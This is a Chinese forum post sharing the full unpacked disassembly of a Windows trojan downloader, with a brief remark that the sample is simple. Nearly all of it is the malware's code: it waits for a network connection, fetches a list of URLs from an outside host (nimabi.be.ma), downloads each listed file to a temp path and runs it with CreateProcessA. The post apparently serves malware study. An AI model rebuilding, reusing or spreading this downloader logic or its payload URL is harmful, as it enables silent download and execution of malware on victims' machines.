[讨论]发个高质量下载样本一个
脱个壳看没什么东西..都很直关.不多说了....谢谢作者给个学习的机会...
00401000 55 push ebp
00401001 8BEC mov ebp,esp
00401003 83C4 AC add esp,-54
00401006 8D45 BC lea eax,dword ptr ss:[ebp-44]
00401009 50 push eax
0040100A E8 17040000 call du_1.00401426 ; jmp to kernel32.GetStartupInfoA
0040100F 8D45 AC lea eax,dword ptr ss:[ebp-54]
00401012 50 push eax
00401013 8D45 BC lea eax,dword ptr ss:[ebp-44]
00401016 50 push eax
00401017 6A 00 push 0
00401019 6A 00 push 0
0040101B 6A 20 push 20
0040101D 6A 00 push 0
0040101F 6A 00 push 0
00401021 6A 00 push 0
00401023 FF75 08 push dword ptr ss:[ebp+8]
00401026 6A 00 push 0
00401028 E8 DB030000 call du_1.00401408 ; jmp to kernel32.CreateProcessA
0040102D 0BC0 or eax,eax
0040102F 75 10 jnz short du_1.00401041
00401031 FF75 B0 push dword ptr ss:[ebp-50]
00401034 E8 BD030000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
00401039 FF75 AC push dword ptr ss:[ebp-54]
0040103C E8 B5030000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
00401041 C9 leave
00401042 C2 0400 retn 4
00401045 55 push ebp
00401046 8BEC mov ebp,esp
00401048 81C4 E8FDFFFF add esp,-218
0040104E 33C0 xor eax,eax
00401050 8945 E8 mov dword ptr ss:[ebp-18],eax
00401053 6A 00 push 0
00401055 6A 00 push 0
00401057 6A 00 push 0
00401059 6A 00 push 0
0040105B 68 06304000 push du_1.00403006 ; ASCII "Shell"
00401060 E8 21040000 call du_1.00401486 ; jmp to wininet.InternetOpenA
00401065 0BC0 or eax,eax
00401067 0F84 F1000000 je du_1.0040115E
0040106D 8945 FC mov dword ptr ss:[ebp-4],eax
00401070 6A 04 push 4
00401072 FF75 10 push dword ptr ss:[ebp+10]
00401075 6A 02 push 2
00401077 FF75 FC push dword ptr ss:[ebp-4]
0040107A E8 19040000 call du_1.00401498 ; jmp to wininet.InternetSetOptionA
0040107F 6A 04 push 4
00401081 FF75 10 push dword ptr ss:[ebp+10]
00401084 6A 06 push 6
00401086 FF75 FC push dword ptr ss:[ebp-4]
00401089 E8 0A040000 call du_1.00401498 ; jmp to wininet.InternetSetOptionA
0040108E 6A 00 push 0
00401090 68 00000020 push 20000000
00401095 6A 00 push 0
00401097 6A 00 push 0
00401099 FF75 08 push dword ptr ss:[ebp+8]
0040109C FF75 FC push dword ptr ss:[ebp-4]
0040109F E8 E8030000 call du_1.0040148C ; jmp to wininet.InternetOpenUrlA
004010A4 0BC0 or eax,eax
004010A6 0F84 AA000000 je du_1.00401156
004010AC 8945 F8 mov dword ptr ss:[ebp-8],eax
004010AF C745 EC 00000000 mov dword ptr ss:[ebp-14],0
004010B6 C745 F0 00020000 mov dword ptr ss:[ebp-10],200
004010BD FF75 EC push dword ptr ss:[ebp-14]
004010C0 8D45 F0 lea eax,dword ptr ss:[ebp-10]
004010C3 50 push eax
004010C4 8D85 E8FDFFFF lea eax,dword ptr ss:[ebp-218]
004010CA 50 push eax
004010CB 6A 13 push 13
004010CD FF75 F8 push dword ptr ss:[ebp-8]
004010D0 E8 9F030000 call du_1.00401474 ; jmp to wininet.HttpQueryInfoA
004010D5 0BC0 or eax,eax
004010D7 74 75 je short du_1.0040114E
004010D9 6A 00 push 0
004010DB 6A 00 push 0
004010DD 6A 04 push 4
004010DF 6A 00 push 0
004010E1 6A 00 push 0
004010E3 68 00000040 push 40000000
004010E8 FF75 0C push dword ptr ss:[ebp+C]
004010EB E8 0C030000 call du_1.004013FC ; jmp to kernel32.CreateFileA
004010F0 83F8 FF cmp eax,-1
004010F3 74 59 je short du_1.0040114E
004010F5 8945 F4 mov dword ptr ss:[ebp-C],eax
004010F8 C745 EC 00000000 mov dword ptr ss:[ebp-14],0
004010FF 8D45 EC lea eax,dword ptr ss:[ebp-14]
00401102 50 push eax
00401103 68 00020000 push 200
00401108 8D85 E8FDFFFF lea eax,dword ptr ss:[ebp-218]
0040110E 50 push eax
0040110F FF75 F8 push dword ptr ss:[ebp-8]
00401112 E8 7B030000 call du_1.00401492 ; jmp to wininet.InternetReadFile
00401117 0BC0 or eax,eax
00401119 74 23 je short du_1.0040113E
0040111B 837D EC 00 cmp dword ptr ss:[ebp-14],0
0040111F 74 1D je short du_1.0040113E
00401121 FF45 E8 inc dword ptr ss:[ebp-18]
00401124 6A 00 push 0
00401126 8D45 F0 lea eax,dword ptr ss:[ebp-10]
00401129 50 push eax
0040112A FF75 EC push dword ptr ss:[ebp-14]
0040112D 8D85 E8FDFFFF lea eax,dword ptr ss:[ebp-218]
00401133 50 push eax
00401134 FF75 F4 push dword ptr ss:[ebp-C]
00401137 E8 1A030000 call du_1.00401456 ; jmp to kernel32.WriteFile
0040113C ^ EB BA jmp short du_1.004010F8
0040113E FF75 F4 push dword ptr ss:[ebp-C]
00401141 E8 FE020000 call du_1.00401444 ; jmp to kernel32.SetEndOfFile
00401146 FF75 F4 push dword ptr ss:[ebp-C]
00401149 E8 A8020000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
0040114E FF75 F8 push dword ptr ss:[ebp-8]
00401151 E8 24030000 call du_1.0040147A ; jmp to wininet.InternetCloseHandle
00401156 FF75 FC push dword ptr ss:[ebp-4]
00401159 E8 1C030000 call du_1.0040147A ; jmp to wininet.InternetCloseHandle
0040115E 8B45 E8 mov eax,dword ptr ss:[ebp-18]
00401161 C9 leave
00401162 C2 0C00 retn 0C
00401165 55 push ebp
00401166 8BEC mov ebp,esp
00401168 81C4 FCFDFFFF add esp,-204
0040116E C745 FC 3C000000 mov dword ptr ss:[ebp-4],3C
00401175 FF75 08 push dword ptr ss:[ebp+8]
00401178 8D85 FCFDFFFF lea eax,dword ptr ss:[ebp-204]
0040117E 50 push eax
0040117F E8 D8020000 call du_1.0040145C ; jmp to kernel32.lstrcpyA
00401184 68 00010000 push 100
00401189 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
0040118F 50 push eax
00401190 E8 A9020000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory
00401195 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
0040119B 50 push eax
0040119C 6A 00 push 0
0040119E 6A 00 push 0
004011A0 68 04304000 push du_1.00403004
004011A5 E8 82020000 call du_1.0040142C ; jmp to kernel32.GetTempFileNameA
004011AA 68 88130000 push 1388
004011AF 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
004011B5 50 push eax
004011B6 8D85 FCFDFFFF lea eax,dword ptr ss:[ebp-204]
004011BC 50 push eax
004011BD E8 83FEFFFF call du_1.00401045
004011C2 0BC0 or eax,eax
004011C4 74 10 je short du_1.004011D6
004011C6 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104]
004011CC 50 push eax
004011CD E8 2EFEFFFF call du_1.00401000
004011D2 EB 15 jmp short du_1.004011E9
004011D4 EB 0D jmp short du_1.004011E3
004011D6 68 E8030000 push 3E8
004011DB E8 6A020000 call du_1.0040144A ; jmp to kernel32.Sleep
004011E0 FF4D FC dec dword ptr ss:[ebp-4]
004011E3 837D FC 00 cmp dword ptr ss:[ebp-4],0
004011E7 ^ 75 C1 jnz short du_1.004011AA
004011E9 FF0D 00304000 dec dword ptr ds:[403000]
004011EF C9 leave
004011F0 C2 0400 retn 4
/////////////入口
004011F3 55 push ebp
004011F4 8BEC mov ebp,esp
004011F6 81C4 E8FEFFFF add esp,-118
004011FC 68 0C304000 push du_1.0040300C ; ASCII "user32.dll"
00401201 E8 2C020000 call du_1.00401432 ; jmp to kernel32.LoadLibraryA
00401206 0BC0 or eax,eax
00401208 74 11 je short du_1.0040121B
0040120A 68 17304000 push du_1.00403017 ; ASCII "LoadRemoteFonts"
0040120F 50 push eax
00401210 E8 0B020000 call du_1.00401420 ; jmp to kernel32.GetProcAddress
00401215 0BC0 or eax,eax
00401217 74 02 je short du_1.0040121B
00401219 FFD0 call eax
0040121B 8D45 FC lea eax,dword ptr ss:[ebp-4]
0040121E 50 push eax
0040121F 68 19000200 push 20019
00401224 6A 00 push 0
00401226 68 27304000 push du_1.00403027 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
0040122B 68 02000080 push 80000002
00401230 E8 33020000 call du_1.00401468 ; jmp to ADVAPI32.RegOpenKeyExA
00401235 0BC0 or eax,eax
00401237 75 48 jnz short du_1.00401281
00401239 C745 F8 04010000 mov dword ptr ss:[ebp-8],104
00401240 68 04010000 push 104
00401245 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
0040124B 50 push eax
0040124C E8 ED010000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory
00401251 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00401254 50 push eax
00401255 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
0040125B 50 push eax
0040125C 6A 00 push 0
0040125E 6A 00 push 0
00401260 68 06304000 push du_1.00403006 ; ASCII "Shell"
00401265 FF75 FC push dword ptr ss:[ebp-4]
00401268 E8 01020000 call du_1.0040146E ; jmp to ADVAPI32.RegQueryValueExA
0040126D 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
00401273 50 push eax
00401274 E8 87FDFFFF call du_1.00401000
00401279 FF75 FC push dword ptr ss:[ebp-4]
0040127C E8 E1010000 call du_1.00401462 ; jmp to ADVAPI32.RegCloseKey
00401281 68 E8030000 push 3E8
00401286 E8 BF010000 call du_1.0040144A ; jmp to kernel32.Sleep
0040128B 6A 00 push 0
0040128D 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00401290 50 push eax
00401291 E8 EA010000 call du_1.00401480 ; jmp to wininet.InternetGetConnectedState
00401296 0BC0 or eax,eax
00401298 75 02 jnz short du_1.0040129C
0040129A ^ EB EF jmp short du_1.0040128B
0040129C 68 04010000 push 104
004012A1 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
004012A7 50 push eax
004012A8 E8 91010000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory
004012AD 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
004012B3 50 push eax
004012B4 6A 00 push 0
004012B6 6A 00 push 0
004012B8 68 04304000 push du_1.00403004
004012BD E8 6A010000 call du_1.0040142C ; jmp to kernel32.GetTempFileNameA
004012C2 68 E8030000 push 3E8
004012C7 E8 7E010000 call du_1.0040144A ; jmp to kernel32.Sleep
004012CC 68 88130000 push 1388
004012D1 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
004012D7 50 push eax
004012D8 68 5D304000 push du_1.0040305D ; ASCII "http://nimabi.be.ma/b/a/m.txt"
004012DD E8 63FDFFFF call du_1.00401045
004012E2 0BC0 or eax,eax
004012E4 75 02 jnz short du_1.004012E8
004012E6 ^ EB E4 jmp short du_1.004012CC
004012E8 6A 00 push 0
004012EA 6A 00 push 0
004012EC 6A 03 push 3
004012EE 6A 00 push 0
004012F0 6A 00 push 0
004012F2 68 00000080 push 80000000
004012F7 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
004012FD 50 push eax
004012FE E8 F9000000 call du_1.004013FC ; jmp to kernel32.CreateFileA
00401303 83F8 FF cmp eax,-1
00401306 0F84 CC000000 je du_1.004013D8
0040130C 8945 F4 mov dword ptr ss:[ebp-C],eax
0040130F 6A 00 push 0
00401311 FF75 F4 push dword ptr ss:[ebp-C]
00401314 E8 01010000 call du_1.0040141A ; jmp to kernel32.GetFileSize
00401319 83F8 0F cmp eax,0F
0040131C 0F82 9F000000 jb du_1.004013C1
00401322 6A 00 push 0
00401324 6A 00 push 0
00401326 6A 00 push 0
00401328 6A 02 push 2
0040132A 6A 00 push 0
0040132C FF75 F4 push dword ptr ss:[ebp-C]
0040132F E8 CE000000 call du_1.00401402 ; jmp to kernel32.CreateFileMappingA
00401334 0BC0 or eax,eax
00401336 0F84 92000000 je du_1.004013CE
0040133C 8945 F0 mov dword ptr ss:[ebp-10],eax
0040133F 6A 00 push 0
00401341 6A 00 push 0
00401343 6A 00 push 0
00401345 6A 04 push 4
00401347 50 push eax
00401348 E8 EB000000 call du_1.00401438 ; jmp to kernel32.MapViewOfFile
0040134D 0BC0 or eax,eax
0040134F 74 66 je short du_1.004013B7
00401351 8945 EC mov dword ptr ss:[ebp-14],eax
00401354 8BF0 mov esi,eax
00401356 8DBD E8FEFFFF lea edi,dword ptr ss:[ebp-118]
0040135C 68 04010000 push 104
00401361 57 push edi
00401362 E8 D7000000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory
00401367 AC lods byte ptr ds:[esi]
00401368 3C 0A cmp al,0A
0040136A 75 01 jnz short du_1.0040136D
0040136C AC lods byte ptr ds:[esi]
0040136D 3C 0D cmp al,0D
0040136F 75 39 jnz short du_1.004013AA
00401371 80BD E8FEFFFF 00 cmp byte ptr ss:[ebp-118],0
00401378 74 2E je short du_1.004013A8
0040137A FF05 00304000 inc dword ptr ds:[403000]
00401380 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00401383 50 push eax
00401384 6A 00 push 0
00401386 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118]
0040138C 50 push eax
0040138D 68 65114000 push du_1.00401165
00401392 6A 00 push 0
00401394 6A 00 push 0
00401396 E8 73000000 call du_1.0040140E ; jmp to kernel32.CreateThread
0040139B 50 push eax
0040139C E8 55000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
004013A1 6A 64 push 64
004013A3 E8 A2000000 call du_1.0040144A ; jmp to kernel32.Sleep
004013A8 ^ EB AC jmp short du_1.00401356
004013AA AA stos byte ptr es:[edi]
004013AB 0AC0 or al,al
004013AD ^ 75 B8 jnz short du_1.00401367
004013AF FF75 EC push dword ptr ss:[ebp-14]
004013B2 E8 99000000 call du_1.00401450 ; jmp to kernel32.UnmapViewOfFile
004013B7 FF75 F0 push dword ptr ss:[ebp-10]
004013BA E8 37000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
004013BF EB 0D jmp short du_1.004013CE
004013C1 FF75 F4 push dword ptr ss:[ebp-C]
004013C4 E8 2D000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
004013C9 ^ E9 FEFEFFFF jmp du_1.004012CC
004013CE FF75 F4 push dword ptr ss:[ebp-C]
004013D1 E8 20000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle
004013D6 EB 05 jmp short du_1.004013DD
004013D8 ^ E9 EFFEFFFF jmp du_1.004012CC
004013DD EB 07 jmp short du_1.004013E6
004013DF 6A 64 push 64
004013E1 E8 64000000 call du_1.0040144A ; jmp to kernel32.Sleep
004013E6 833D 00304000 00 cmp dword ptr ds:[403000],0
004013ED ^ 75 F0 jnz short du_1.004013DF
004013EF 6A 00 push 0
004013F1 E8 1E000000 call du_1.00401414 ; jmp to kernel32.ExitProcess
004013F1 E8 1E000000 call du_1.00401414 ; jmp to kernel32.ExitProcess
004013F6 - FF25 54204000 jmp dword ptr ds:[402054] ; kernel32.CloseHandle
004013FC - FF25 4C204000 jmp dword ptr ds:[40204C] ; kernel32.CreateFileA
00401402 - FF25 48204000 jmp dword ptr ds:[402048] ; kernel32.CreateFileMappingA
00401408 - FF25 2C204000 jmp dword ptr ds:[40202C] ; kernel32.CreateProcessA
0040140E - FF25 10204000 jmp dword ptr ds:[402010] ; kernel32.CreateThread
00401414 - FF25 14204000 jmp dword ptr ds:[402014] ; kernel32.ExitProcess
0040141A - FF25 18204000 jmp dword ptr ds:[402018] ; kernel32.GetFileSize
00401420 - FF25 1C204000 jmp dword ptr ds:[40201C] ; kernel32.GetProcAddress
00401426 - FF25 20204000 jmp dword ptr ds:[402020] ; kernel32.GetStartupInfoA
0040142C - FF25 24204000 jmp dword ptr ds:[402024] ; kernel32.GetTempFileNameA
00401432 - FF25 28204000 jmp dword ptr ds:[402028] ; kernel32.LoadLibraryA
00401438 - FF25 50204000 jmp dword ptr ds:[402050] ; kernel32.MapViewOfFile
0040143E - FF25 30204000 jmp dword ptr ds:[402030] ; ntdll.RtlZeroMemory
00401444 - FF25 34204000 jmp dword ptr ds:[402034] ; kernel32.SetEndOfFile
0040144A - FF25 38204000 jmp dword ptr ds:[402038] ; kernel32.Sleep
00401450 - FF25 3C204000 jmp dword ptr ds:[40203C] ; kernel32.UnmapViewOfFile
00401456 - FF25 40204000 jmp dword ptr ds:[402040] ; kernel32.WriteFile
0040145C - FF25 44204000 jmp dword ptr ds:[402044] ; kernel32.lstrcpyA
00401462 - FF25 04204000 jmp dword ptr ds:[402004] ; ADVAPI32.RegCloseKey
00401468 - FF25 00204000 jmp dword ptr ds:[402000] ; ADVAPI32.RegOpenKeyExA
0040146E - FF25 08204000 jmp dword ptr ds:[402008] ; ADVAPI32.RegQueryValueExA
00401474 - FF25 74204000 jmp dword ptr ds:[402074] ; wininet.HttpQueryInfoA
0040147A - FF25 5C204000 jmp dword ptr ds:[40205C] ; wininet.InternetCloseHandle
00401480 - FF25 60204000 jmp dword ptr ds:[402060] ; wininet.InternetGetConnectedState
00401486 - FF25 64204000 jmp dword ptr ds:[402064] ; wininet.InternetOpenA
0040148C - FF25 68204000 jmp dword ptr ds:[402068] ; wininet.InternetOpenUrlA
00401492 - FF25 6C204000 jmp dword ptr ds:[40206C] ; wininet.InternetReadFile
00401498 - FF25 70204000 jmp dword ptr ds:[402070] ; wininet.InternetSetOptionA
活跃值:
在线值:
浏览人数:116
最近活跃:0
注册时间:2006-09-19
